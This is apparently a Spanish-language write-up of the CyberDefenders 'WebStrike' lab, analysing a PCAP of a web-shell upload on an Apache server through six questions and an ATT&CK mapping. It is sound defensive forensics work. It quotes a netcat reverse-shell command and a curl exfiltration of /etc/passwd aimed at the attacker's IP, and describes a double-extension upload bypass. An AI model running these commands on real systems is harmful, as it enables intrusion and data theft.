WebStrike - CyberDefenders

Escenario

Actividad sospechosa en un servidor web corporativo. Se dispone de un PCAP para analizar cómo el atacante subió una web shell, ejecutó una reverse shell e intentó exfiltrar datos.

  • Víctima: Servidor web (Linux/Apache)
  • Evidencia: PCAP (tráfico de red)
  • Misión: Identificar entrada, archivos subidos, comandos ejecutados, datos objetivo

Herramientas

  • Wireshark — análisis PCAP, HTTP Stream, filtros
  • IP Geolocation — geolocalización del atacante

Análisis

Q1. ¿De qué ciudad se originó el ataque?

Respuesta: Tianjin, China

Evidencia: Statistics → Endpoints → IPv4 muestra la IP 117.11.88.124 como origen. Geolocalización vía ipgeolocation.io la ubica en Tianjin.


Q2. ¿Cuál es el User-Agent del atacante?

Respuesta: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Evidencia: Siguiendo el HTTP Stream del atacante, la solicitud GET revela este User-Agent. El atacante se hace pasar por Firefox en Linux para mezclarse con tráfico legítimo.


P3. ¿Cuál es el nombre del shell web malicioso que se cargó correctamente?

Respuesta: image.jpg.php

Evidencia: Filtro ip.src == 117.11.88.124 && http.request.method == "POST" revela dos intentos:

  • Primero: image.php → rechazado (Invalid file format)
  • Segundo: image.jpg.php → éxito (File uploaded successfully)

El atacante evade la validación del servidor añadiendo .jpg al nombre — bypass de filtro de extensiones.


Q4. ¿Qué directorio utiliza el sitio web para almacenar los archivos cargados?

Respuesta: /reviews/uploads/

Evidencia: Tras la carga, una solicitud GET a /reviews/uploads devuelve 301 Moved Permanently redirigiendo a /reviews/uploads/. Las cargas se procesan vía /reviews/upload.php.


Q5. ¿Qué puerto en la máquina del atacante fue usado para la reverse shell?

Respuesta: 8080

Evidencia: El contenido de image.jpg.php contiene el comando de reverse shell:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 117.11.88.124 8080 > /tmp/f

Netcat (nc) conecta de vuelta a 117.11.88.124:8080.


P6. ¿Qué archivo intentaba exfiltrar el atacante?

Respuesta: /etc/passwd

Evidencia: Filtro (tcp.port == 8080) && (ip.src == 24.49.63.79). En el flujo TCP de la reverse shell, el atacante ejecuta:

curl -X POST -d /etc/passwd http://117.11.88.124:443/

El archivo /etc/passwd permite enumerar usuarios del sistema para escalada de privilegios.


MITRE ATT&CK

TácticaTécnica
Initial AccessT1190 — Exploit Public-Facing Application
ExecutionT1059.004 — Unix Shell (reverse shell)
PersistenceT1505.003 — Web Shell
ExfiltrationT1041 — Exfiltration Over C2 Channel